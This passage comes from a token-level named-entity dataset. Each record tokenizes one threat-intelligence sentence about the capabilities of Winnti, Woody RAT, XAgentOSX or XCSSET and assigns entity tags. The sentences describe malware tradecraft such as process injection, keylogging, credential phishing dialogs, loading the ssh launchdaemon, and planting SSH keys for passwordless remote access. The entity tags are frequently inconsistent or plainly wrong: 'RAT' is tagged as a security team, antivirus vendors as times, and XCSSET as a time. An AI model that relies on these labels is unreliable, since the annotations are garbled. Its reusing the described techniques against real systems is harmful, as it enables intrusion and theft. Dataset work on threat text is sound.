- "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "has", - "the", - "ability", - "to", - "use", - "encapsulated", - "HTTP/S", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "sets", - "its", - "DLL", - "file", - "as", - "a", - "new", - "service", - "in", - "the", - "Registry", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "is", - "believed", - "that", - "a", - "patch", - "management", - "system", - "for", - "an", - "anti-virus", - "product", - "commonly", - "installed", - "among", - "targeted", - "companies", - "was", - "used", - "to", - "distribute", - "the", - "Wiper", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "identify", - "administrator", - "accounts", - "on", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "use", - "RSA-4096", - "to", - "encrypt", - "data", - "sent", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "collect", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "deobfuscate", - "Base64-encoded", - "strings", - "and", - "scripts." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "has", - "used", - "Base64", - "encoded", - "strings", - "and", - "scripts." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "exfiltrate", - "files", - "from", - "an", - "infected", - "machine", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "has", - "relied", - "on", - "CVE-2022-30190", - "(Follina)", - "for", - "execution", - "during", - "delivery." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "has", - "the", - "ability", - "to", - "delete", - "itself", - "from", - "disk", - "by", - "creating", - "a", - "suspended", - "notepad", - "process", - "and", - "writing", - "shellcode", - "to", - "delete", - "a", - "file", - "into", - "the", - "suspended", - "process", - "using", - "`NtWriteVirtualMemory`." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "list", - "all", - "files", - "and", - "their", - "associated", - "attributes,", - "including", - "filename,", - "type,", - "owner,", - "creation", - "time,", - "last", - "access", - "time,", - "last", - "write", - "time,", - "size,", - "and", - "permissions." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "has", - "suppressed", - "all", - "error", - "reporting", - "by", - "calling", - "`SetErrorMode`", - "with", - "0x8007", - "as", - "a", - "parameter." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "download", - "files", - "from", - "its", - "C2", - "server,", - "including", - "the", - ".NET", - "DLLs,", - "`WoodySharpExecutor`", - "and", - "`WoodyPowerSession`." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "make", - "`Ping`", - "GET", - "HTTP", - "requests", - "to", - "its", - "C2", - "server", - "at", - "regular", - "intervals", - "for", - "network", - "connectivity", - "checks." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "has", - "relied", - "on", - "users", - "opening", - "a", - "malicious", - "email", - "attachment", - "for", - "execution." - ], - "ner_tags": [ - "B-HackOrg", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "use", - "multiple", - "native", - "APIs,", - "including", - "`WriteProcessMemory`,", - "`CreateProcess`,", - "and", - "`CreateRemoteThread`", - "for", - "process", - "injection." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "execute", - "PowerShell", - "commands", - "and", - "scripts", - "with", - "the", - "use", - "of", - ".NET", - "DLL,", - "`WoodyPowerSession`." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "call", - "`NtQuerySystemProcessInformation`", - "with", - "`SystemProcessInformation`", - "to", - "enumerate", - "all", - "running", - "processes,", - "including", - "associated", - "information", - "such", - "as", - "PID,", - "parent", - "PID,", - "image", - "name,", - "and", - "owner." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "create", - "a", - "suspended", - "notepad", - "process", - "and", - "write", - "shellcode", - "to", - "delete", - "a", - "file", - "into", - "the", - "suspended", - "process", - "using", - "`NtWriteVirtualMemory`." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "inject", - "code", - "into", - "a", - "targeted", - "process", - "by", - "writing", - "to", - "the", - "remote", - "memory", - "of", - "an", - "infected", - "system", - "and", - "then", - "create", - "a", - "remote", - "thread." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "search", - "registry", - "keys", - "to", - "identify", - "antivirus", - "programs", - "on", - "an", - "compromised", - "host." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "has", - "the", - "ability", - "to", - "take", - "a", - "screenshot", - "of", - "the", - "infected", - "host", - "desktop", - "using", - "Windows", - "GDI+." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "detect", - "Avast", - "Software,", - "Doctor", - "Web,", - "Kaspersky,", - "AVG,", - "ESET,", - "and", - "Sophos", - "antivirus", - "programs." - ], - "ner_tags": [ - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "B-Way", - "B-Tool", - "I-Tool", - "O", - "B-Time", - "B-Way", - "B-Time", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "collect", - ".NET,", - "PowerShell,", - "and", - "Python", - "information", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "B-Features", - "B-SamFile", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "has", - "been", - "delivered", - "via", - "malicious", - "Word", - "documents", - "and", - "archive", - "files." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "use", - "AES-CBC", - "to", - "encrypt", - "data", - "sent", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "retrieve", - "the", - "following", - "information", - "from", - "an", - "infected", - "machine:", - "OS,", - "architecture,", - "computer", - "name,", - "OS", - "build", - "version,", - "environment", - "variables,", - "and", - "storage", - "drives." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "retrieve", - "network", - "interface", - "and", - "proxy", - "information." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "retrieve", - "a", - "list", - "of", - "user", - "accounts", - "and", - "usernames", - "from", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "communicate", - "with", - "its", - "C2", - "server", - "using", - "HTTP", - "requests." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Woody", - "RAT", - "can", - "execute", - "commands", - "using", - "`cmd.exe`." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "XAgentOSX", - "contains", - "the", - "getFirefoxPassword", - "function", - "to", - "attempt", - "to", - "locate", - "Firefox", - "passwords." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XAgentOSX", - "contains", - "the", - "deletFileFromPath", - "function", - "to", - "delete", - "a", - "specified", - "file", - "using", - "the", - "NSFileManager:removeFileAtPath", - "method." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "XAgentOSX", - "contains", - "the", - "ftpUpload", - "function", - "to", - "use", - "the", - "FTPManager:uploadFile", - "method", - "to", - "upload", - "files", - "from", - "the", - "target", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XAgentOSX", - "contains", - "the", - "readFiles", - "function", - "to", - "return", - "a", - "detailed", - "listing", - "(sometimes", - "recursive)", - "of", - "a", - "specified", - "directory.", - "XAgentOSX", - "contains", - "the", - "showBackupIosFolder", - "function", - "to", - "check", - "for", - "IOS", - "device", - "backups", - "by", - "running", - "<code>ls", - "-la", - "~/Library/Application\\", - "Support/MobileSync/Backup/</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XAgentOSX", - "contains", - "keylogging", - "functionality", - "that", - "will", - "monitor", - "for", - "active", - "application", - "windows", - "and", - "write", - "them", - "to", - "the", - "log,", - "it", - "can", - "handle", - "special", - "characters,", - "and", - "it", - "will", - "buffer", - "by", - "default", - "50", - "characters", - "before", - "sending", - "them", - "out", - "over", - "the", - "C2", - "infrastructure." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XAgentOSX", - "contains", - "the", - "execFile", - "function", - "to", - "execute", - "a", - "specified", - "file", - "on", - "the", - "system", - "using", - "the", - "NSTask:launch", - "method." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "XAgentOSX", - "contains", - "the", - "getProcessList", - "function", - "to", - "run", - "<code>ps", - "aux</code>", - "to", - "get", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "XAgentOSX", - "contains", - "the", - "takeScreenShot", - "(along", - "with", - "startTakeScreenShot", - "and", - "stopTakeScreenShot)", - "functions", - "to", - "take", - "screenshots", - "using", - "the", - "CGGetActiveDisplayList,", - "CGDisplayCreateImage,", - "and", - "NSImage:initWithCGImage", - "methods." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "XAgentOSX", - "contains", - "the", - "getInstalledAPP", - "function", - "to", - "run", - "<code>ls", - "-la", - "/Applications</code>", - "to", - "gather", - "what", - "applications", - "are", - "installed." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XAgentOSX", - "contains", - "the", - "getInfoOSX", - "function", - "to", - "return", - "the", - "OS", - "X", - "version", - "as", - "well", - "as", - "the", - "current", - "user." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "attempts", - "to", - "discover", - "accounts", - "from", - "various", - "locations", - "such", - "as", - "a", - "user's", - "Evernote,", - "AppleID,", - "Telegram,", - "Skype,", - "and", - "WeChat", - "data." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "will", - "compress", - "entire", - "<code>~/Desktop</code>", - "folders", - "excluding", - "all", - "<code>.git</code>", - "folders,", - "but", - "only", - "if", - "the", - "total", - "data", - "size", - "is", - "under", - "200MB." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "uses", - "a", - "malicious", - "browser", - "application", - "to", - "replace", - "the", - "legitimate", - "browser", - "in", - "order", - "to", - "continuously", - "capture", - "credentials,", - "monitor", - "web", - "traffic,", - "and", - "download", - "additional", - "modules." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "adds", - "malicious", - "code", - "to", - "a", - "host's", - "Xcode", - "projects", - "by", - "enumerating", - "CocoaPods", - "<code>target_integrator.rb</code>", - "files", - "under", - "the", - "<code>/Library/Ruby/Gems</code>", - "folder", - "or", - "enumerates", - "all", - "<code>.xcodeproj</code>", - "folders", - "under", - "a", - "given", - "directory.", - "XCSSET", - "then", - "downloads", - "a", - "script", - "and", - "Mach-O", - "file", - "into", - "the", - "Xcode", - "project", - "folder." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "performs", - "AES-CBC", - "encryption", - "on", - "files", - "under", - "<code>~/Documents</code>,", - "<code>~/Downloads</code>,", - "and", - "<code>~/Desktop</code>", - "with", - "a", - "fixed", - "key", - "and", - "renames", - "files", - "to", - "give", - "them", - "a", - "<code>.enc</code>", - "extension.", - "Only", - "files", - "with", - "sizes", - "less", - "than", - "500MB", - "are", - "encrypted." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "collects", - "contacts", - "and", - "application", - "data", - "from", - "files", - "in", - "Desktop,", - "Documents,", - "Downloads,", - "Dropbox,", - "and", - "WeChat", - "folders." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "adds", - "malicious", - "file", - "paths", - "to", - "the", - "<code>DYLD_FRAMEWORK_PATH</code>", - "and", - "<code>DYLD_LIBRARY_PATH</code>", - "environment", - "variables", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "exfiltrates", - "data", - "stolen", - "from", - "a", - "system", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "has", - "used", - "a", - "zero-day", - "exploit", - "in", - "the", - "ssh", - "launchdaemon", - "to", - "elevate", - "privileges", - "and", - "bypass", - "SIP." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "has", - "used", - "`mdfind`", - "to", - "enumerate", - "a", - "list", - "of", - "apps", - "known", - "to", - "grant", - "screen", - "sharing", - "permissions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "XCSSET", - "prompts", - "the", - "user", - "to", - "input", - "credentials", - "using", - "a", - "native", - "macOS", - "dialog", - "box", - "leveraging", - "the", - "system", - "process", - "<code>/Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "has", - "dropped", - "a", - "malicious", - "applet", - "into", - "an", - "app's", - "`.../Contents/MacOS/`", - "folder", - "of", - "a", - "previously", - "launched", - "app", - "to", - "bypass", - "Gatekeeper's", - "security", - "checks", - "on", - "first", - "launch", - "apps", - "(prior", - "to", - "macOS", - "13)." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "uses", - "a", - "hidden", - "folder", - "named", - "<code>.xcassets</code>", - "and", - "<code>.git</code>", - "to", - "embed", - "itself", - "in", - "Xcode." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "downloads", - "browser", - "specific", - "AppleScript", - "modules", - "using", - "a", - "constructed", - "URL", - "with", - "the", - "<code>curl</code>", - "command,", - "<code>https://\"", - "&", - "domain", - "&", - "\"/agent/scripts/\"", - "&", - "moduleName", - "&", - "\".applescript</code>." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "uses", - "the", - "ssh", - "launchdaemon", - "to", - "elevate", - "privileges,", - "bypass", - "system", - "controls,", - "and", - "enable", - "remote", - "access", - "to", - "the", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "loads", - "a", - "system", - "level", - "launchdaemon", - "using", - "the", - "<code>launchctl", - "load", - "-w</code>", - "command", - "from", - "<code>/System/Librarby/LaunchDaemons/ssh.plist</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "uses", - "the", - "<code>chmod", - "+x</code>", - "command", - "to", - "grant", - "executable", - "permissions", - "to", - "the", - "malicious", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "builds", - "a", - "malicious", - "application", - "bundle", - "to", - "resemble", - "Safari", - "through", - "using", - "the", - "Safari", - "icon", - "and", - "<code>Info.plist</code>." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "XCSSET", - "uses", - "the", - "<code>plutil</code>", - "command", - "to", - "modify", - "the", - "<code>LSUIElement</code>,", - "<code>DFBundleDisplayName</code>,", - "and", - "<code>CFBundleIdentifier</code>", - "keys", - "in", - "the", - "<code>/Contents/Info.plist</code>", - "file", - "to", - "change", - "how", - "XCSSET", - "is", - "visible", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "will", - "create", - "an", - "ssh", - "key", - "if", - "necessary", - "with", - "the", - "<code>ssh-keygen", - "-t", - "rsa", - "-f", - "$HOME/.ssh/id_rsa", - "-P</code>", - "command.", - "XCSSET", - "will", - "upload", - "a", - "private", - "key", - "file", - "to", - "the", - "server", - "to", - "remotely", - "access", - "the", - "host", - "without", - "a", - "password." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "saves", - "a", - "screen", - "capture", - "of", - "the", - "victim's", - "system", - "with", - "a", - "numbered", - "filename", - "and", - "<code>.jpg</code>", - "extension.", - "Screen", - "captures", - "are", - "taken", - "at", - "specified", - "intervals", - "based", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "searches", - "firewall", - "configuration", - "files", - "located", - "in", - "<code>/Library/Preferences/</code>", - "and", - "uses", - "<code>csrutil", - "status</code>", - "to", - "determine", - "if", - "System", - "Integrity", - "Protection", - "is", - "enabled." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "uses", - "<code>ps", - "aux</code>", - "with", - "the", - "<code>grep</code>", - "command", - "to", - "enumerate", - "common", - "browsers", - "and", - "system", - "processes", - "potentially", - "impacting", - "XCSSET's", - "exfiltration", - "capabilities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "uses", - "<code>scp</code>", - "to", - "access", - "the", - "<code>~/Library/Cookies/Cookies.binarycookies</code>", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "uses", - "RC4", - "encryption", - "over", - "TCP", - "to", - "communicate", - "with", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "identifies", - "the", - "macOS", - "version", - "and", - "uses", - "<code>ioreg</code>", - "to", - "determine", - "serial", - "number." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "XCSSET", - "uses", - "AppleScript", - "to", - "check", - "the", - "host's", - "language", - "and", - "location", - "with", - "the", - "command", - "<code>user", - "locale", - "of", - "(get", - "system", - "info)</code>." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Using", - "the", - "machine's", - "local", - "time,", - "XCSSET", - "waits", - "43200", - "seconds", - "(12", - "hours)", - "from", - "the", - "initial", - "creation", - "timestamp", - "of", - "a", - "specific", - "file,", - "<code>.report</code>.", - "After", - "the", - "elapsed", - "time,", - 